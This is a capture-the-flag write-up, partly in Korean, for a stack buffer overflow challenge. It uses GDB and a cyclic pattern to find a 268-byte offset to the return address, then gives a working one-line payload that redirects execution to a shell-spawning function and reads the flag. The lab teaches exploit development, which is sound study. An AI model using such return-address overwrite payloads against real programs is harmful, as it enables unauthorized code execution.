# [pwnerrank | Binary exploitation] Stack based Buffer Overflow - Return address @ 2017.01.05

[Stack based Buffer Overflow - Return address](https://www.pwnerrank.com/tasks/stack-based-buffer-overflow-return-address)

## Code

```c

#include < stdio.h >
#include < stdlib.h >
#include < string.h >

void pwned()
{
system("sh");
}

int main(int argc, char*argv[])
{
char buffer[256];

if(argc < 2) {
 perror("Usage: ./pwnme twitt\n");
return 1;
}

strcpy(buffer,argv[1]);
printf("%s", buffer);

return 0;
}
```

## Analysis

#### #1

Stack 구성이   `buffer[256] + SFP + saved eip` 로 될 것으로 예상하여 공격하였으나 잘 안 됨.

```bash
$ ./pwnme `python -c 'print "A"*256 + "B"*4 + "\xec\x84\x04\x08"'`
 _____                           _____             _
|  __ \                         |  __ \           | |
| |__) |_      ___ __   ___ _ __| |__) |__ _ _ __ | | __
|  ___/\ \ /\ / / '_ \ / _ \ '__|  _  // _` | '_ \| |/ /
| |     \ V  V /| | | |  __/ |  | | \ \ (_| | | | |   <
|_|      \_/\_/ |_| |_|\___|_|  |_|  \_\__,_|_| |_|_|\_\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBpwn5@binary-challenges-pwnerrank-com:~$ cat .flag
cat: .flag: Permission denied
```

#### #2

GDB 로 debugging 을 해보니 `256+4` 보다 몇 개 뒤에 `LR` 이 잡힘.

[Svenito/exploit-pattern: generate and search pattern string for exploit development](https://github.com/Svenito/exploit-pattern)
로 crashed lr 위치 확인

```bash
# Create pattern
$ ./pattern.py 300
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9

# Debug
(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Starting program: /home/pwn5/pwnme Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
/bin/bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
 _____                           _____             _
|  __ \                         |  __ \           | |
| |__) |_      ___ __   ___ _ __| |__) |__ _ _ __ | | __
|  ___/\ \ /\ / / '_ \ / _ \ '__|  _  // _` | '_ \| |/ /
| |     \ V  V /| | | |  __/ |  | | \ \ (_| | | | |   <
|_|      \_/\_/ |_| |_|\___|_|  |_|  \_\__,_|_| |_|_|\_\

Program received signal SIGSEGV, Segmentation fault.
0x6a413969 in ?? ()

# Check
$ ./pattern.py 0x6a413969
Pattern 0x6a413969 first occurrence at position 268 in pattern.
```

`256+4` 가 아니라 `268` 뒤에 LR 이 잡힘.  왜지 ?

## Exploit

```bash
$ ./pwnme `python -c 'print "A"*268 + "\xec\x84\x04\x08"\'`
 _____                           _____             _
|  __ \                         |  __ \           | |
| |__) |_      ___ __   ___ _ __| |__) |__ _ _ __ | | __
|  ___/\ \ /\ / / '_ \ / _ \ '__|  _  // _` | '_ \| |/ /
| |     \ V  V /| | | |  __/ |  | | \ \ (_| | | | |   <
|_|      \_/\_/ |_| |_|\___|_|  |_|  \_\__,_|_| |_|_|\_\
$ cat .flag
pwnerrank{this_is_not_the_real_flag}
```


